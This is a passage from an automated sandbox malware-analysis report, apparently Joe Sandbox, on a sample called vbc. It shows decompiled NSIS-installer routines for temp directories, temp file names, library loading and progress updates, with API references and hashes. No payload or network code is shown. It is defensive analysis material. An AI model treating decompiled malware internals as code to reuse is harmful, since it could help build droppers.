				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4017390910
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 73281817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E73281817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7328506c = _a8;
				 *0x73285070 = _a16;
				 *0x73285074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73285048, E73281651);
				_push(1); // executed
				_t37 = E73281BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7328243E(_t54);
					}
					_push(_t54);
					E73282480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E73282655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73281666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E73282655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E73282655();
							_t37 = GlobalFree(E73281312(E73281654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73282618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E732815DD( *0x73285068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73282E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73282B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73282810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x73281817
0x73281817
0x73281817
0x73281824
0x7328182c
0x73281839
0x73281847
0x7328184a
0x7328184c
0x73281851
0x73281856
0x73281978
0x73281978
0x7328185c
0x73281860
0x73281863
0x73281868
0x73281869
0x7328186a
0x73281870
0x73281876
0x732818a6
0x732818ad
0x732818d1
0x7328191e
0x7328191f
0x732818d3
0x732818d3
0x732818d4
0x732818dd
0x732818de
0x732818e8
0x732818eb
0x732818f0
0x732818f7
0x732818f7
0x732818fd
0x732818fe
0x73281904
0x7328190a
0x73281917
0x73281918
0x7328191b
0x732818af
0x732818af
0x732818b0
0x732818c5
0x732818c5
0x73281929
0x7328192c
0x73281939
0x73281940
0x73281948
0x7328194b
0x7328194b
0x73281948
0x73281958
0x73281960
0x73281965
0x73281958
0x7328196d
0x00000000
0x7328196f
0x00000000
0x73281970
0x7328196d
0x7328187a
0x7328187d
0x7328189b
0x00000000
0x00000000
0x7328189e
0x732818a3
0x732818a3
0x732818a5
0x00000000
0x732818a5
0x7328187f
0x73281880
0x73281888
0x73281889
0x00000000
0x73281889
0x73281882
0x73281883
0x73281891
0x00000000
0x73281891
0x73281886
0x00000000
0x00000000
0x00000000
0x73281886

APIs

Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E74
Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E79
Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E7E

GlobalFree.KERNEL32(00000000), ref: 732818C5
FreeLibrary.KERNEL32(?), ref: 7328194B
GlobalFree.KERNEL32(00000000), ref: 73281970

Part of subcall function 7328243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7328246F

Part of subcall function 73282810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73281896,00000000), ref: 732828E0

Part of subcall function 73281666: wsprintfW.USER32 ref: 73281694

Strings

, xrefs: 73281951

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
Instruction ID: 50984e9d651121102e6edebaceb5b54fa93795519466b6b085e403dc143bfc0e
Opcode Fuzzy Hash: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
Instruction Fuzzy Hash: A941B6726003569BEB119F74E988BD537ACBF04314F188865E94B9E0C6DBB8E0C5C760

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406062
0x00406068
0x00406069
0x00406069
0x0040606e
0x0040606f
0x00406072
0x00406077
0x0040607a
0x00406084
0x00406091
0x00406095
0x0040609d
0x00000000
0x00000000
0x004060a1
0x00000000
0x004060a3
0x004060a3
0x004060a3
0x004060a6
0x004060a9
0x004060a9
0x004060ac
0x00000000

APIs

GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069
C:\Users\user\AppData\Local\Temp\, xrefs: 00406061

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4262883142
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1

SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405672 Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00405672(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x434f28;
				_t10 =  *0x434f2c;
				__imp__OleInitialize(0); // executed
				 *0x434fc0 =  *0x434fc0 | __eax;
				E004044E5(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x818;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x434f8c =  *0x434f8c + 1;
				}
				L7:
				E004044E5(0x404);
				__imp__OleUninitialize();
				return  *0x434f8c;
			}

0x00405673
0x0040567a
0x00405682
0x00405688
0x00405690
0x00405697
0x00405699
0x0040569c
0x0040569c
0x004056a1
0x00000000
0x00000000
0x004056b2
0x004056ba
0x00000000
0x00000000
0x004056bc
0x00000000
0x004056ba
0x004056be
0x004056be
0x004056c4
0x004056c9
0x004056ce
0x004056db

APIs

OleInitialize.OLE32(00000000), ref: 00405682

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

OleUninitialize.OLE32 ref: 004056CE

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
